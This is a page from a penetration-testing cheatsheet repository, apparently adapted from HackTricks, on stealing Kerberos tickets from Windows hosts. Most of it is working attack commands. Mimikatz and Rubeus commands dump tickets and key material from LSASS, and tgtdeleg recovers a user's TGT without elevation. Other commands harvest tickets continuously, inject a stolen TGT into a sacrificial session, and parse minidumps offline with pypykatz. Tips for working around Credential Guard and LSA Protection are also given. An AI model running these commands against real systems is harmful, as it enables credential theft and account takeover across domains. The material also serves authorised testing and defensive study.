daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

harvesting-tickets-from-windows.md (5731B)


      1 ---
      2 title: "Harvesting tickets from Windows"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Harvesting tickets from Windows
     14 
     15 Tickets in Windows are managed and stored by the **lsass** (Local Security Authority Subsystem Service) process, responsible for handling security policies. A non-administrative user can usually only access their own logon session, while an administrator (or `SYSTEM`) can enumerate and extract tickets across the host. On modern Windows builds, **LSA Protection** and **Credential Guard** frequently make old "just dump LSASS" tradecraft less reliable, so combine quick native triage, targeted dumping, and offline parsing instead of assuming a single command will always return every ticket.<sup>[[3]](#references)</sup>
     16 
     17 ### Native triage
     18 
     19 Before exporting anything, confirm whether the current session already has useful Kerberos material and whether you need elevation to reach other logon sessions:
     20 
     21 ```batch
     22 klist
     23 klist tgt
     24 klist sessions
     25 ```
     26 
     27 `klist` doesn't export tickets, but it quickly confirms whether the current logon session already has a **TGT**, which **service tickets** are cached, and whether it is worth escalating before touching LSASS.<sup>[[1]](#references)</sup>
     28 
     29 ### Mimikatz
     30 
     31 Mimikatz is still the fastest option when you can read LSASS, and it is also useful against an offline **LSASS minidump**.<sup>[[1]](#references)</sup>
     32 
     33 ```bash
     34 # Live LSASS access
     35 privilege::debug
     36 sekurlsa::tickets /export
     37 sekurlsa::ekeys
     38 
     39 # Parse an offline dump instead of reading lsass.exe again
     40 sekurlsa::minidump C:\Temp\lsass.dmp
     41 sekurlsa::tickets /export
     42 ```
     43 
     44 `sekurlsa::ekeys` is especially useful in modern **AES-first** domains because it returns Kerberos key material you can reuse in [over-pass-the-hash / pass-the-key](/hacktricks/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key) workflows even when full ticket extraction is inconvenient.
     45 
     46 ### Rubeus
     47 
     48 Rubeus is usually the best first choice because it lets you **triage before dumping** and can work without elevation for some actions.<sup>[[2]](#references)</sup>
     49 
     50 ```bash
     51 # Quick recon first: list LUID, username, service and expiry
     52 .\Rubeus.exe triage
     53 .\Rubeus.exe logonsession
     54 
     55 # Dump only the interesting tickets
     56 .\Rubeus.exe dump /service:krbtgt /nowrap
     57 .\Rubeus.exe dump /luid:0x3e7 /service:krbtgt /nowrap   # SYSTEM / machine-account context
     58 .\Rubeus.exe dump /luid:0x3e4 /nowrap                   # NETWORK SERVICE
     59 .\Rubeus.exe dump /luid:0x3e5 /nowrap                   # LOCAL SERVICE
     60 ```
     61 
     62 As a rule of thumb, **non-elevated** `triage`/`dump` only see the current user's logon session. **Elevated** execution lets you enumerate other users, service logons, and machine-account tickets across the host.
     63 
     64 If you cannot open LSASS but you can execute as the victim user, `tgtdeleg` is the most useful fallback because it abuses the Kerberos delegation/GSS-API flow to recover the **current user's TGT without elevation**:
     65 
     66 ```bash
     67 .\Rubeus.exe tgtdeleg /nowrap
     68 .\Rubeus.exe tgtdeleg /outfile:user_tgt.kirbi
     69 ```
     70 
     71 For long-lived access on a workstation, Rubeus can also harvest tickets **as they appear** instead of doing one noisy one-shot dump:
     72 
     73 ```bash
     74 .\Rubeus.exe monitor /filteruser:*admin* /interval:30 /nowrap
     75 .\Rubeus.exe harvest /filteruser:svc_* /outdir:C:\ProgramData\tickets
     76 ```
     77 
     78 If you want to inject a stolen TGT without overwriting your current ticket cache, create a sacrificial logon session first and then use that LUID for `ptt`:
     79 
     80 ```bash
     81 .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
     82 .\Rubeus.exe ptt /ticket:C:\Temp\admin.kirbi /luid:0xA1234
     83 ```
     84 
     85 `createnetonly` prints the new LUID when it spawns the sacrificial session; inject into that session to keep your original TGT untouched. Ticket injection/replay and cross-platform conversion are covered in [Pass the Ticket](/hacktricks/windows-hardening/active-directory-methodology/pass-the-ticket).
     86 
     87 ### Parsing LSASS dumps offline
     88 
     89 When EDR or **LSASS-as-PPL** makes repeated live access too noisy, export a **full-memory LSASS dump** once and parse it off-host. `pypykatz` can extract `.kirbi` tickets from that dump directly:
     90 
     91 ```bash
     92 pypykatz lsa minidump lsass.dmp -k tickets/
     93 ```
     94 
     95 ### Modern Windows nuances
     96 
     97 On recent Windows 11 / Server 2025 estates, **LSASS protected process** and **Credential Guard** make old live-LSASS ticket dumping much less predictable. In practice:<sup>[[3]](#references)</sup>
     98 
     99 - expect **TGT extraction** to fail first when Credential Guard is enabled, while **service tickets** may still be present/useful.
    100 - target specific **LUIDs** instead of bulk-dumping everything whenever possible.
    101 - fall back to `tgtdeleg`, offline minidump parsing, or `sekurlsa::ekeys` when live LSASS access is restricted.
    102 - if you need the protection internals and common bypass considerations, read [Windows credentials protections](/hacktricks/windows-hardening/stealing-credentials/credentials-protections).
    103 
    104 ## References
    105 
    106 - [1] [Kerberos (II): How to attack Kerberos?](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
    107 - [2] [Rubeus Overview](https://docs.specterops.io/ghostpack-docs/Rubeus-mdx/overview)
    108 - [3] [Microsoft Learn — Credential Guard overview](https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/)